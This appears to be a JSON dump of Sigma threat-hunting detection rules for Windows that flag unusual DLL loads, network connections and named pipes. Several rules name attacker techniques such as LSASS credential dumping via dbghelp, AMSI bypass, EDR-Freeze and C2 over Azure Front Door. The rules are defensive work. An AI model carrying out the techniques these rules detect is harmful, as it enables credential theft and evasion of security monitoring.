    "content": "title: Amsi.DLL Load By Uncommon Process\nid: facd1549-e416-48e0-b8c4-41d7215eedc8\nstatus: test\ndescription: Detects loading of Amsi.dll by uncommon processes\nreferences:\n    - https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9\n    - https://github.com/TheD1rkMtr/AMSI_patch\n    - https://github.com/surya-dev-singh/AmsiBypass-OpenSession\nauthor: frack113\ndate: 2023-03-12\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\amsi.dll'\n    filter_main_exact:\n        Image|endswith:\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\Sysmon64.exe'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n    filter_optional_defender:\n        Image|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_main_dotnet:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\ngentask.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate third party apps installed in \"ProgramData\" and \"AppData\" might generate some false positives. Apply additional filters accordingly\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_bitsproxy_load_by_uncommon_process.yml",
    "content": "title: BITS Client BitsProxy DLL Loaded By Uncommon Process\nid: e700ff14-1bff-4d1d-9438-738dff5f0466\nstatus: experimental\ndescription: |\n    Detects an uncommon process loading the \"BitsProxy.dll\". This DLL is used when the BITS COM instance or API is used.\n    This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.\nreferences:\n    - https://unicornofhunt.com/2025/05/22/When-Unicorns-Go-Quiet-BITS-Jobs-and-the-Art-of-Stealthy-Transfers/\nauthor: UnicornOfHunt\ndate: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\BitsProxy.dll'\n    filter_main_system:\n        Image:\n            - 'C:\\Windows\\System32\\aitstatic.exe'\n            - 'C:\\Windows\\System32\\bitsadmin.exe'\n            - 'C:\\Windows\\System32\\desktopimgdownldr.exe'\n            - 'C:\\Windows\\System32\\DeviceEnroller.exe'\n            - 'C:\\Windows\\System32\\MDMAppInstaller.exe'\n            - 'C:\\Windows\\System32\\ofdeploy.exe'\n            - 'C:\\Windows\\System32\\RecoveryDrive.exe'\n            - 'C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe'\n            # - 'C:\\Windows\\System32\\svchost.exe' # BITS Service - If you collect CommandLine info. Apply a filter for the specific BITS service.\n            - 'C:\\Windows\\SysWOW64\\bitsadmin.exe'\n            - 'C:\\Windows\\SysWOW64\\OneDriveSetup.exe'\n            - 'C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe'\n    filter_optional_chrome:\n        Image: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Allowed binaries in the environment that do BITS Jobs\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml",
    "content": "title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process\nid: 0e277796-5f23-4e49-a490-483131d4f6e1\nrelated:\n    - id: bdc64095-d59a-42a2-8588-71fd9c9d9abc # Unsigned Loading\n      type: similar\nstatus: test\ndescription: |\n    Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.\n    The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\n    As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n    Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.\nreferences:\n    - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\n    - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html\n    - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6\nauthor: Perez Diego (@darkquassar), oscd.community, Ecco\ndate: 2019-10-27\nmodified: 2024-03-01\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\dbghelp.dll'\n            - '\\dbgcore.dll'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\dnx.exe'\n            - '\\excel.exe'\n            - '\\monitoringhost.exe'\n            - '\\msbuild.exe'\n            - '\\mshta.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\regsvcs.exe'\n            - '\\rundll32.exe'\n            - '\\sc.exe'\n            - '\\scriptrunner.exe'\n            - '\\winword.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            # - '\\powershell.exe' # Note: Triggered by installing common software\n            # - '\\regsvr32.exe'  # Note: triggered by installing common software\n            # - '\\schtasks.exe'  # Note: triggered by installing software\n            # - '\\svchost.exe'  # Note: triggered by some services\n    filter_main_tiworker:\n        # Note: This filter requires \"CommandLine\" field enrichment\n        CommandLine|startswith: 'C:\\WINDOWS\\WinSxS\\'\n        CommandLine|endswith: '\\TiWorker.exe -Embedding'\n    filter_main_generic:\n        # Note: This filter requires \"CommandLine\" field enrichment\n        Image|endswith: '\\svchost.exe'\n        CommandLine|endswith:\n            - '-k LocalServiceNetworkRestricted'\n            - '-k WerSvcGroup'\n    filter_main_rundll32:\n        # Note: This filter requires \"CommandLine\" field enrichment\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - '/d srrstr.dll,ExecuteScheduledSPPCreation'\n            - 'aepdu.dll,AePduRunUpdate'\n            - 'shell32.dll,OpenAs_RunDL'\n            - 'Windows.Storage.ApplicationData.dll,CleanupTemporaryState'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Debugging scripts might leverage this DLL in order to dump process memory for further analysis.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_system_drawing_load.yml",
    "content": "title: System Drawing DLL Load\nid: 666ecfc7-229d-42b8-821e-1a8f8cb7057c\nstatus: test\ndescription: Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/16\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-02-22\ntags:\n    - attack.collection\n    - attack.t1113\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\System.Drawing.ni.dll'\n    condition: selection\nfalsepositives:\n    - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_taskschd_by_process_in_potentially_suspicious_location.yml",
    "content": "title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location\nid: 3b92a1d0-8d4b-4d28-a1b4-1e29d49a6a3e\nstatus: test\ndescription: |\n    Detects the loading of the \"taskschd.dll\" module from a process that located in a potentially suspicious or uncommon directory.\n    The loading of this DLL might indicate that the application have the capability to create a scheduled task via the \"Schedule.Service\" COM object.\n    Investigation of the loading application and its behavior is required to determining if its malicious.\nreferences:\n    - https://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/\n    - https://x.com/Max_Mal_/status/1826179497084739829\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-09-02\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_dll:\n        - ImageLoaded|endswith: '\\taskschd.dll'\n        - OriginalFileName: 'taskschd.dll'\n    selection_paths:\n        Image|contains:\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers might generate false positives, apply additional filters accordingly.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_office_excel_xll_load.yml",
    "content": "title: Microsoft Excel Add-In Loaded\nid: c5f4b5cb-4c25-4249-ba91-aa03626e3185\nstatus: test\ndescription: Detects Microsoft Excel loading an Add-In (.xll) file\nreferences:\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-12\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\excel.exe'\n        ImageLoaded|endswith: '.xll'\n    condition: selection\nfalsepositives:\n    - The rules is only looking for \".xll\" loads. So some false positives are expected with legitimate and allowed XLLs\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_office_word_wll_load.yml",
    "content": "title: Microsoft Word Add-In Loaded\nid: 1337afba-d17d-4d23-bd55-29b927603b30\nstatus: test\ndescription: |\n    Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.\nreferences:\n    - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\n    - https://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file\nauthor: Steffen Rogge (dr0pd34d)\ndate: 2024-07-10\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\winword.exe'\n        ImageLoaded|endswith: '.wll'\n    condition: selection\nfalsepositives:\n    - The rules is only looking for \".wll\" loads. So some false positives are expected with legitimate and allowed WLLs.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load.yml",
    "content": "title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze\nid: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\nrelated:\n    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\n      type: similar\n    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the loading of dbgcore.dll or dbghelp.dll by WerFaultSecure.exe, which has been observed in EDR-Freeze attacks to suspend processes and evade detection.\n    However, this behavior has also been observed during normal software installations, so further investigation is required to confirm malicious activity.\n    When threat hunting, look for this activity in conjunction with other suspicious processes starting, network connections, or file modifications that occur shortly after the DLL load.\n    Pay special attention to timing - if other malicious activities occur during or immediately after this library loading, it may indicate EDR evasion attempts.\n    Also correlate with any EDR/AV process suspension events or gaps in security monitoring during the timeframe.\nreferences:\n    - https://github.com/TwoSevenOneT/EDR-Freeze\n    - https://blog.axelarator.net/hunting-for-edr-freeze/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\nmodified: 2026-01-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\WerFaultSecure.exe'\n        ImageLoaded|endswith:\n            - '\\dbgcore.dll'\n            - '\\dbghelp.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_wmi_module_load_by_uncommon_process.yml",
    "content": "title: WMI Module Loaded By Uncommon Process\nid: 671bb7e3-a020-4824-a00e-2ee5b55f385e\nstatus: test\ndescription: Detects WMI modules being loaded by an uncommon process\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2025-02-24\ntags:\n    - attack.execution\n    - attack.t1047\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\fastprox.dll'\n            - '\\wbemcomn.dll'\n            - '\\wbemprox.dll'\n            - '\\wbemsvc.dll'\n            - '\\WmiApRpl.dll'\n            - '\\wmiclnt.dll'\n            - '\\WMINet_Utils.dll'\n            - '\\wmiprov.dll'\n            - '\\wmiutils.dll'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    filter_optional_other:\n        Image|endswith:\n            - '\\WindowsAzureGuestAgent.exe'\n            - '\\WaAppAgent.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_defender:\n        Image|endswith: '\\MsMpEng.exe'\n    filter_optional_teams:\n        Image|contains:\n            - '\\Microsoft\\Teams\\current\\Teams.exe'\n            - '\\Microsoft\\Teams\\Update.exe'\n    filter_optional_sysmon:\n        Image|endswith:\n            - ':\\Windows\\Sysmon.exe'\n            - ':\\Windows\\Sysmon64.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_dfsvc_non_local_ip.yml",
    "content": "title: Dfsvc.EXE Network Connection To Non-Local IPs\nid: 3c21219b-49b5-4268-bce6-c914ed50f09c\nstatus: test\ndescription: Detects network connections from \"dfsvc.exe\" used to handled ClickOnce applications to non-local IPs\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\nmodified: 2024-03-12\ntags:\n    - attack.execution\n    - attack.t1203\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dfsvc.exe'\n        Initiated: 'true'\n    filter_main_local_ip:\n        DestinationIp|cidr: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '169.254.0.0/16'  # link-local address\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_dfsvc_uncommon_ports.yml",
    "content": "title: Dfsvc.EXE Initiated Network Connection Over Uncommon Port\nid: 4c5fba4a-9ef6-4f16-823d-606246054741\nstatus: test\ndescription: Detects an initiated network connection over uncommon ports from \"dfsvc.exe\". A utility used to handled ClickOnce applications.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\nmodified: 2024-01-31\ntags:\n    - attack.execution\n    - attack.t1203\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|contains: ':\\Windows\\Microsoft.NET\\'\n        Image|endswith: '\\dfsvc.exe'\n        Initiated: 'true'\n    filter_main_known_ports:\n        DestinationPort:\n            - 80\n            - 443\n    filter_optional_dns_ipv6:\n        # Based on VT. More than 140 binaries made communication over DNS\n        DestinationIsIpv6: 'true'\n        DestinationPort: 53\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml",
    "content": "title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address\nid: cfed2f44-16df-4bf3-833a-79405198b277\nstatus: test\ndescription: |\n    Detects Dllhost.EXE initiating a network connection to a non-local IP address.\n    Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.\n    An initial baseline is recommended before deployment.\nreferences:\n    - https://redcanary.com/blog/child-processes/\n    - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\nauthor: bartblaze\ndate: 2020-07-13\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - attack.t1559.001\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dllhost.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    filter_main_msrange:\n        DestinationIp|cidr:\n            - '20.184.0.0/13' # Microsoft Corporation\n            - '20.192.0.0/10' # Microsoft Corporation\n            - '23.72.0.0/13'  # Akamai International B.V.\n            - '51.10.0.0/15'  # Microsoft Corporation\n            - '51.103.0.0/16' # Microsoft Corporation\n            - '51.104.0.0/15' # Microsoft Corporation\n            - '52.224.0.0/11'  # Microsoft Corporation\n            - '150.171.0.0/19'  # Microsoft Corporation\n            - '204.79.197.0/24' # Microsoft Corporation'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_hh_http_connection.yml",
    "content": "title: HH.EXE Initiated HTTP Network Connection\nid: 468a8cea-2920-4909-a593-0cbe1d96674a\nrelated:\n    - id: f57c58b3-ee69-4ef5-9041-455bf39aaa89\n      type: derived\nstatus: test\ndescription: |\n    Detects a network connection initiated by the \"hh.exe\" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\hh.exe'\n        Initiated: 'true'\n        DestinationPort:\n            - 80\n            - 443\n    condition: selection\nfalsepositives:\n    - False positive is expected from launching \"hh.exe\" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_msiexec_http.yml",
    "content": "title: Msiexec.EXE Initiated Network Connection Over HTTP\nid: 8e5e38e4-5350-4c0b-895a-e872ce0dd54f\nstatus: test\ndescription: |\n    Detects a network connection initiated by an \"Msiexec.exe\" process over port 80 or 443.\n    Adversaries might abuse \"msiexec.exe\" to install and execute remotely hosted packages.\n    Use this rule to hunt for potentially anomalous or suspicious communications.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\msiexec.exe'\n        DestinationPort:\n            - 80\n            - 443\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_powershell_network_connection.yml",
    "content": "title: Network Connection Initiated By PowerShell Process\nid: 1f21ec3f-810d-4b0e-8045-322202e22b4b\nstatus: test\ndescription: |\n    Detects a network connection that was initiated from a PowerShell process.\n    Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.\n    Use this rule as a basis for hunting for anomalies.\nreferences:\n    - https://www.youtube.com/watch?v=DLtJTxMWZ2o\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-13\nmodified: 2024-03-13\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Initiated: 'true'\n    filter_main_local_ip:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '169.254.0.0/16'  # link-local address\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_main_msrange:\n        DestinationIp|cidr:\n            - '20.184.0.0/13'\n            - '51.103.210.0/23'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative scripts\n    - Microsoft IP range\n    - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range')\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_susp_azurefd_connection.yml",
    "content": "title: Potentially Suspicious Azure Front Door Connection\nid: 8cb4d14e-776e-43c2-8fb9-91e7fcea32b4\nstatus: test\ndescription: |\n    Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)\n    that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)\nreferences:\n    - https://lots-project.com/site/2a2e617a75726566642e6e6574\n    - https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178\n    - https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting\nauthor: Isaac Dunham\ndate: 2024-11-07\ntags:\n    - attack.command-and-control\n    - attack.t1102.002\n    - attack.t1090.004\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname|contains: 'azurefd.net'\n    filter_main_web_browsers:\n        Image|endswith:\n            - 'brave.exe'\n            - 'chrome.exe'\n            - 'chromium.exe'\n            - 'firefox.exe'\n            - 'msedge.exe'\n            - 'msedgewebview2.exe'\n            - 'opera.exe'\n            - 'vivaldi.exe'\n    filter_main_common_talkers:\n        Image|endswith: 'searchapp.exe' # Windows search service uses signifcant amount of Azure FD\n    filter_main_known_benign_domains:\n        DestinationHostname|contains:\n            - 'afdxtest.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'fp-afd.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'roxy.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net' # Used by VS Code; Cisco Umbrella top 1m\n            - 'storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net' # Used by Azure Storage Explorer; Cisco Umbrella top 1m\n            - 'graph.azurefd.net' # MS Graph; Cisco Umbrella top 1m\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.\n    - Organization-specific Azure Front Door endpoints\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_susp_initaited_public_folder.yml",
    "content": "title: Network Connection Initiated From Users\\Public Folder\nid: bcb03938-9f8b-487d-8d86-e480691e1d71\nrelated:\n    - id: 7b434893-c57d-4f41-908d-6a17bf1ae98f\n      type: derived\nstatus: test\ndescription: |\n    Detects a network connection initiated from a process located in the \"C:\\Users\\Public\" folder.\n    Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.\n    Use this rule to hunt for potential suspicious or uncommon activity in your environement.\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems)\ndate: 2024-05-31\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|contains: ':\\Users\\Public\\'\n    filter_optional_ibm:\n        Image|contains: ':\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\' # IBM Client Solutions Default Location (Added by Tim Shelton - https://github.com/SigmaHQ/sigma/pull/3053/files)\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Likely from legitimate third party application that execute from the \"Public\" directory.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml",
    "content": "title: PsExec Default Named Pipe\nid: f3f3a972-f982-40ad-b63c-bca6afdfad7c\nrelated:\n    - id: 42c575ea-e41e-41f1-b248-8093c3e82a28\n      type: derived\nstatus: test\ndescription: Detects PsExec service default pipe creation\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\n    - detection.threat-hunting\nlogsource:\n    category: pipe_created\n    product: windows\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName: '\\PSEXESVC'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml",
    "content": "title: Uncommon PowerShell Hosts\nid: d7326048-328b-4d5e-98af-86e84b17c765\nrelated:\n    - id: 64e8e417-c19a-475a-8d19-98ea705394cc\n      type: derived\nstatus: test\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-11\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'HostApplication='\n    # Note: Powershell Logging Data is localized. Meaning that \"HostApplication\" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer ammount of possibilities. It's up to the user to add these cases.\n    filter_main_ps:\n        Data|contains:\n            - 'HostApplication=?:/Windows/System32/WindowsPowerShell/v1.0/powershell' # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=?:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell' # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=?:\\Windows\\System32\\sdiagnhost.exe'\n            - 'HostApplication=?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - 